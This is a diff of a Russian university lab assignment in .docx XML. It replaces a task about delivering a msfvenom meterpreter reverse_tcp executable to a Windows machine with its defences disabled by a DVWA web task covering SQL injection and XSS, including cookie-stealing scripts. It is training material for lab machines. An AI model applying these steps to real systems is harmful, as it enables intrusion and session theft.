--- a/3 КУРС/ЛР ПСЗИ/ЛР5/ЛР5.docx
+++ b/3 КУРС/ЛР ПСЗИ/ЛР5/ЛР5.docx
@@ -199,15 +199,6 @@
     <w:bookmarkEnd w:id="0"/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Default"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="426" w:right="9"/>
         <w:jc w:val="center"/>
@@ -225,7 +216,7 @@
           <w:bCs/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>ДОПОЛНИТЕЛЬНЫЕ МЕТОДЫ ЭКСПЛУАТАЦИИ УЯЗВИМОСТЕЙ НА ОБЪЕКТЕ ЗАЩИТЫ ИНФОРМАЦИИ</w:t>
+        <w:t>БАЗОВЫЕ МЕТОДЫ ИССЛЕДОВАНИЯ УРОНЯ ЗАЩИЩЁННОСТИ WEB ПРИЛОЖЕНИЙ</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -421,6 +412,22 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="567" w:right="434"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
@@ -1045,7 +1052,7 @@
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>ся с</w:t>
+        <w:t>ся</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1057,18 +1064,8 @@
         <w:rPr>
           <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t>дополнительными средствами эксплуатации уязвимостей, используемых для упрощения автоматизации контроля степени защищённости объекта защиты информации.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>с основными методами поиска уязвимостей в WEB приложениях, основанных на использовании инструментов анализа и модификации сетевого трафика.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1117,13 +1114,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Default"/>
       </w:pPr>
     </w:p>
@@ -1132,20 +1122,61 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Настройте сеть и запустите обе ОС. </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Установит</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ь</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Burp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Suite и прове</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сти</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> его настройку. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1153,20 +1184,21 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">В системе Windows отключите защитника и </w:t>
+        <w:spacing w:after="36" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Установить </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1174,7 +1206,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>фаервол</w:t>
+        <w:t>Metasploitable</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1182,7 +1214,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">, а также включите сетевое обнаружение. </w:t>
+        <w:t xml:space="preserve"> 2 в комплекте с платформой DVWA. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1190,91 +1222,37 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">В системе Linux запустить сервер базы данных командой </w:t>
+        <w:spacing w:after="36" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Установить программный комплекс </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t>service</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t>postgresql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t>start</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1282,20 +1260,21 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">В системе Linux запустить </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Выполнить привязку двух машин (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1303,7 +1282,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Armitage</w:t>
+        <w:t>Kali</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1311,34 +1290,94 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> командой </w:t>
+        <w:t xml:space="preserve"> Linux и </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Чтобы узнать адрес машины </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, использовать команду </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ifconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. После проверить работоспособность схемы с помощью команды: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ping</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>IP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-адрес </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="23"/>
-          <w:szCs w:val="23"/>
-        </w:rPr>
-        <w:t>Armitage</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1354,20 +1393,21 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">В системе Linux подключите базу данных </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Зайти через браузер </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1375,7 +1415,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Metasploit</w:t>
+        <w:t>Kali</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1383,7 +1423,71 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Если она была использована в предыдущей работе, то БД инициализируется автоматически, если нет, но настройте подключение к ней и повторите процедуру. </w:t>
+        <w:t xml:space="preserve"> Linux на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Ввести в строку запросов IP-адрес машины, на которую установлен </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Выбрать тренировочную площадку DVWA. В качестве логина и пароля для входа использовать </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1391,20 +1495,21 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Используя </w:t>
+        <w:spacing w:after="38" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Перейти в настройки и выбрать уровень безопасности </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1412,7 +1517,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>msfvenom</w:t>
+        <w:t>low</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1420,7 +1525,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> скомпилируйте файл с полезной нагрузкой </w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Выполнить задания во вкладках: SQL </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1428,7 +1540,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>meterpreter</w:t>
+        <w:t>Injection</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1436,16 +1548,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> с расширением .</w:t>
+        <w:t xml:space="preserve">, XSS </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>exe</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1453,15 +1564,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> указав </w:t>
+        <w:t xml:space="preserve">, XSS </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1469,7 +1572,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>lhost</w:t>
+        <w:t>Stored</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1477,7 +1580,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (IP адрес машины Linux). Рекомендуется использовать модуль </w:t>
+        <w:t xml:space="preserve">. В качестве дополнительного задания: пройти SQL </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1485,7 +1588,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Metasploit</w:t>
+        <w:t>Injection</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1493,7 +1596,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> под названием </w:t>
+        <w:t xml:space="preserve">, XSS </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1501,7 +1604,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>reverce</w:t>
+        <w:t>Reflected</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1509,7 +1612,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> и XSS </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1517,7 +1620,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>tcp</w:t>
+        <w:t>Stored</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1525,7 +1628,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">, запущенных при помощи </w:t>
+        <w:t xml:space="preserve"> на уровне безопасности </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1533,7 +1636,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Armitage</w:t>
+        <w:t>medium</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1549,38 +1652,44 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">С помощью python3 -m </w:t>
+        <w:spacing w:after="36" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Привести скриншот выполнения задания SQL </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>http.server</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Injection</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> разместите вредоносный файл на </w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> содержащий подбор правильного запроса к БД. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Привести скриншот выполнения задания XSS </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1588,7 +1697,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>web</w:t>
+        <w:t>Stored</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1596,7 +1705,28 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">-интерфейсе </w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> содержащий по</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>д</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">бор правильного скрипта, извлекающего </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1604,7 +1734,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Kali</w:t>
+        <w:t>cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1612,7 +1742,37 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Linux (запускается из каталога с файлом). </w:t>
+        <w:t xml:space="preserve"> текущей сессии</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> включающий скрипт и скриншот результата запроса. Привести скриншот выполнения задания XSS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> содержащий информацию о получении доменной части источника происхождения текущего документа, включающий скрипт и скриншот результата работы скрипта.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1620,20 +1780,114 @@
         <w:pStyle w:val="Default"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="19"/>
+          <w:numId w:val="20"/>
         </w:numPr>
-        <w:spacing w:after="36"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Скачайте файл и запустите его с правами администратора на Windows. </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
